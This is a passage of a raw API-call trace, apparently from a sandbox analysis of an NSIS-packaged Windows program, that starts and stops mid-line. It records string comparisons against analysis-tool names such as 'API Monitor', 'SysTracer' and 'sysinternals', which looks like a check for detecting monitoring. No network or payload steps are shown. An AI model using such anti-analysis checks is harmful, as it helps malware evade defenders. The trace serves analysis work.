lpString1=0x40a418, lpString2="Start", iMaxLength=1024 | out: lpString1="Start") returned="Start" [0158.668] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.668] lstrcpynA (in: lpString1=0x337acc, lpString2="Start", iMaxLength=1024 | out: lpString1="Start") returned="Start" [0158.668] lstrcpynA (in: lpString1=0x432c00, lpString2="Start", iMaxLength=1024 | out: lpString1="Start") returned="Start" [0158.669] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.669] lstrlenA (lpString="") returned 0 [0158.669] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.669] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.669] lstrlenA (lpString="") returned 0 [0158.669] lstrcpynA (in: lpString1=0x337f14, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.669] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.669] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.669] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.669] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.669] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.669] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.669] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.669] lstrcpynA (in: lpString1=0x33835c, lpString2="ntdll::strstr(t R1, t R0)i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t R0)i.R0 ?c") returned="ntdll::strstr(t R1, t R0)i.R0 ?c" [0158.669] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.669] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.669] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.670] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.670] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.670] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.670] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.670] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.670] lstrcpynA (in: lpString1=0x341200, lpString2="Start", iMaxLength=1024 | out: lpString1="Start") returned="Start" [0158.670] lstrcpynA (in: lpString1=0x3401e0, lpString2="Start", iMaxLength=1024 | out: lpString1="Start") returned="Start" [0158.670] lstrcpynA (in: lpString1=0x341200, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.670] lstrcpynA (in: lpString1=0x340df8, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.670] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.670] strstr (_Str="Start", _SubStr="API Monitor") returned 0x0 [0158.670] lstrcpynA (in: lpString1=0x341200, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.670] lstrcpynA (in: lpString1=0x341200, lpString2="Start", iMaxLength=1024 | out: lpString1="Start") returned="Start" [0158.671] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.671] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.671] lstrcpynA (in: lpString1=0x433400, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.671] lstrcpynA (in: lpString1=0x433000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.671] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.671] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.671] lstrlenA (lpString="0") returned 1 [0158.671] lstrcpynA (in: lpString1=0x337684, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.671] lstrcpynA (in: lpString1=0x40a418, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.671] lstrcpynA (in: lpString1=0x33723c, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.671] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.671] lstrcpynA (in: lpString1=0x432800, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.671] lstrcpynA (in: lpString1=0x430000, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.671] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.671] lstrlenA (lpString="0") returned 1 [0158.671] lstrcpynA (in: lpString1=0x42e3a0, lpString2="Start", iMaxLength=1024 | out: lpString1="Start") returned="Start" [0158.671] lstrlenA (lpString="Start") returned 5 [0158.671] lstrcpynA (in: lpString1=0x33723c, lpString2="Start", iMaxLength=1024 | out: lpString1="Start") returned="Start" [0158.671] lstrcpynA (in: lpString1=0x337684, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.671] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.671] lstrlenA (lpString="3399936") returned 7 [0158.671] lstrcpynA (in: lpString1=0x337acc, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.672] lstrcpynA (in: lpString1=0x40a418, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.672] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.672] lstrcpynA (in: lpString1=0x337acc, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.672] lstrcpynA (in: lpString1=0x432800, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.672] lstrcpynA (in: lpString1=0x40a418, lpString2="Start", iMaxLength=1024 | out: lpString1="Start") returned="Start" [0158.672] lstrcpynA (in: lpString1=0x33723c, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.672] lstrcpynA (in: lpString1=0x337684, lpString2="Start", iMaxLength=1024 | out: lpString1="Start") returned="Start" [0158.672] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.672] lstrlenA (lpString="") returned 0 [0158.672] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.672] lstrcpynA (in: lpString1=0x40a418, lpString2="Start", iMaxLength=1024 | out: lpString1="Start") returned="Start" [0158.672] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.672] lstrcpynA (in: lpString1=0x337acc, lpString2="Start", iMaxLength=1024 | out: lpString1="Start") returned="Start" [0158.672] lstrcpynA (in: lpString1=0x432c00, lpString2="Start", iMaxLength=1024 | out: lpString1="Start") returned="Start" [0158.672] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.672] lstrlenA (lpString="") returned 0 [0158.672] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.673] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.673] lstrlenA (lpString="") returned 0 [0158.673] lstrcpynA (in: lpString1=0x337f14, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.673] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.673] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.673] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.673] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.673] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.673] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.673] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.673] lstrcpynA (in: lpString1=0x33835c, lpString2="ntdll::strstr(t R1, t R0)i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t R0)i.R0 ?c") returned="ntdll::strstr(t R1, t R0)i.R0 ?c" [0158.673] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.673] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.673] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.673] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.674] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.674] lstrcpyA (in: lpString1=0x3401e0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.674] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.674] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.674] lstrcpynA (in: lpString1=0x3401e0, lpString2="Start", iMaxLength=1024 | out: lpString1="Start") returned="Start" [0158.674] lstrcpynA (in: lpString1=0x341200, lpString2="Start", iMaxLength=1024 | out: lpString1="Start") returned="Start" [0158.674] lstrcpynA (in: lpString1=0x3401e0, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.674] lstrcpynA (in: lpString1=0x340df8, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.674] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.674] strstr (_Str="Start", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.674] lstrcpynA (in: lpString1=0x3401e0, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.674] lstrcpynA (in: lpString1=0x3401e0, lpString2="Start", iMaxLength=1024 | out: lpString1="Start") returned="Start" [0158.674] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.674] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.675] lstrcpynA (in: lpString1=0x433400, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.675] lstrcpynA (in: lpString1=0x433000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.675] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.675] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.675] lstrlenA (lpString="0") returned 1 [0158.675] lstrcpynA (in: lpString1=0x337684, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.675] lstrcpynA (in: lpString1=0x40a418, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.675] lstrcpynA (in: lpString1=0x33723c, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.675] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.675] lstrcpynA (in: lpString1=0x432800, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.675] lstrcpynA (in: lpString1=0x430000, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.675] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.675] lstrlenA (lpString="0") returned 1 [0158.675] lstrcpynA (in: lpString1=0x42e3a0, lpString2="Start", iMaxLength=1024 | out: lpString1="Start") returned="Start" [0158.675] lstrlenA (lpString="Start") returned 5 [0158.675] lstrcpynA (in: lpString1=0x33723c, lpString2="Start", iMaxLength=1024 | out: lpString1="Start") returned="Start" [0158.676] lstrcpynA (in: lpString1=0x337684, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.676] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.676] lstrlenA (lpString="3399936") returned 7 [0158.676] lstrcpynA (in: lpString1=0x337acc, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.676] lstrcpynA (in: lpString1=0x40a418, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.676] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.676] lstrcpynA (in: lpString1=0x337acc, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.676] lstrcpynA (in: lpString1=0x432800, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.676] lstrcpynA (in: lpString1=0x40a418, lpString2="Start", iMaxLength=1024 | out: lpString1="Start") returned="Start" [0158.676] lstrcpynA (in: lpString1=0x33723c, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.676] lstrcpynA (in: lpString1=0x337684, lpString2="Start", iMaxLength=1024 | out: lpString1="Start") returned="Start" [0158.676] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.676] lstrlenA (lpString="") returned 0 [0158.676] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.676] lstrcpynA (in: lpString1=0x40a418, lpString2="Start", iMaxLength=1024 | out: lpString1="Start") returned="Start" [0158.676] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.676] lstrcpynA (in: lpString1=0x337acc, lpString2="Start", iMaxLength=1024 | out: lpString1="Start") returned="Start" [0158.676] lstrcpynA (in: lpString1=0x432c00, lpString2="Start", iMaxLength=1024 | out: lpString1="Start") returned="Start" [0158.676] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.676] lstrlenA (lpString="") returned 0 [0158.676] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.677] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.677] lstrlenA (lpString="") returned 0 [0158.677] lstrcpynA (in: lpString1=0x337f14, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.677] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.677] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.677] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.677] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.677] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.677] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.677] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.677] lstrcpynA (in: lpString1=0x33835c, lpString2="ntdll::strstr(t R1, t R0)i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t R0)i.R0 ?c") returned="ntdll::strstr(t R1, t R0)i.R0 ?c" [0158.677] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.677] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.677] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.678] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.678] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.678] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.678] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.678] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.678] lstrcpynA (in: lpString1=0x341200, lpString2="Start", iMaxLength=1024 | out: lpString1="Start") returned="Start" [0158.678] lstrcpynA (in: lpString1=0x3401e0, lpString2="Start", iMaxLength=1024 | out: lpString1="Start") returned="Start" [0158.678] lstrcpynA (in: lpString1=0x341200, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.678] lstrcpynA (in: lpString1=0x340df8, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.678] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.679] strstr (_Str="Start", _SubStr="sysinternals") returned 0x0 [0158.679] lstrcpynA (in: lpString1=0x341200, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.679] lstrcpynA (in: lpString1=0x341200, lpString2="Start", iMaxLength=1024 | out: lpString1="Start") returned="Start" [0158.679] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.680] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.680] lstrcpynA (in: lpString1=0x433400, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.680] lstrcpynA (in: lpString1=0x433000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.680] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.680] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.680] lstrlenA (lpString="0") returned 1 [0158.680] lstrcpynA (in: lpString1=0x337684, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.680] lstrcpynA (in: lpString1=0x40a418, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.680] lstrcpynA (in: lpString1=0x33723c, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.680] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.681] lstrcpynA (in: lpString1=0x432800, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.681] lstrcpynA (in: lpString1=0x430000, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.681] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.681] lstrlenA (lpString="0") returned 1 [0158.681] lstrcpynA (in: lpString1=0x33723c, lpString2="1", iMaxLength=1024 | out: lpString1="1") returned="1" [0158.681] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.681] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.681] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.681] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.681] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.681] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.681] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.681] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.681] lstrlenA (lpString="3399936") returned 7 [0158.681] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.681] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.681] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") 